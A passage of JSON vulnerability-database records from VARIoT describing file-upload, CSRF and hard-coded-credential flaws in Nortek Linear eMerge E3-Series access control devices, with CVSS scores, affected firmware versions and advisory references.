"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7257",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34632",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158692",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 10.0,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7257",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7257",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34632",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-106",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158692",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"db": "VULHUB",
"id": "VHN-158692"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-106"
},
{
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow Unrestricted File Upload. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a code issue vulnerability. An attacker could use this vulnerability to upload a file with an arbitrary extension to a path in the application\u0027s Web root directory and execute the file with Web server permissions",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7257"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"db": "VULHUB",
"id": "VHN-158692"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-158692",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158692"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7257",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "155254",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-106",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34632",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "47622",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158692",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"db": "VULHUB",
"id": "VHN-158692"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-106"
},
{
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"id": "VAR-201907-0158",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"db": "VULHUB",
"id": "VHN-158692"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34632"
}
]
},
"last_update_date": "2024-03-18T22:23:59.510000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-434",
"trust": 1.1
},
{
"problemtype": "Unlimited uploads of dangerous types of files (CWE-434) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158692"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7257"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155254/linear-emerge-e3-1.00-06-arbitrary-file-upload-remote-root-code-execution.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47622"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"db": "VULHUB",
"id": "VHN-158692"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-106"
},
{
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"db": "VULHUB",
"id": "VHN-158692"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-106"
},
{
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158692"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-106"
},
{
"date": "2019-07-02T19:15:11.227000",
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"date": "2019-11-12T00:00:00",
"db": "VULHUB",
"id": "VHN-158692"
},
{
"date": "2024-03-07T07:23:00",
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"date": "2019-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-106"
},
{
"date": "2022-10-14T01:32:10.637000",
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-106"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerability in Unrestricted Upload of Dangerous Files on Series Devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-106"
}
],
"trust": 0.6
}
}
VAR-201907-0163
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow Cross-Site Request Forgery (CSRF). (DoS) It may be in a state. Nortek Security&Control Linear eMerge E3-Series is an access control device from Nortek Security&Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0163",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-099"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7262",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7262",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-158697",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7262",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7262",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-099",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-158697",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158697"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-099"
},
{
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow Cross-Site Request Forgery (CSRF). (DoS) It may be in a state. Nortek Security\u0026Control Linear eMerge E3-Series is an access control device from Nortek Security\u0026Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7262"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"db": "VULHUB",
"id": "VHN-158697"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7262",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "155263",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005915",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-099",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "47620",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158697",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158697"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-099"
},
{
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"id": "VAR-201907-0163",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158697"
}
],
"trust": 0.01
},
"last_update_date": "2024-03-18T22:23:59.485000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.1
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158697"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155263/nortek-linear-emerge-e3-access-control-cross-site-request-forgery.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7262"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47620"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158697"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-099"
},
{
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158697"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-099"
},
{
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158697"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-099"
},
{
"date": "2019-07-02T18:15:12.143000",
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-12T00:00:00",
"db": "VULHUB",
"id": "VHN-158697"
},
{
"date": "2024-03-07T08:28:00",
"db": "JVNDB",
"id": "JVNDB-2019-005915"
},
{
"date": "2019-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-099"
},
{
"date": "2022-10-14T01:14:27.337000",
"db": "NVD",
"id": "CVE-2019-7262"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-099"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Cross-site request forgery vulnerability in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005915"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-099"
}
],
"trust": 0.6
}
}
VAR-201907-0162
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices have Hard-coded Credentials. Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.
Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to bypass authentication detection
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0162",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
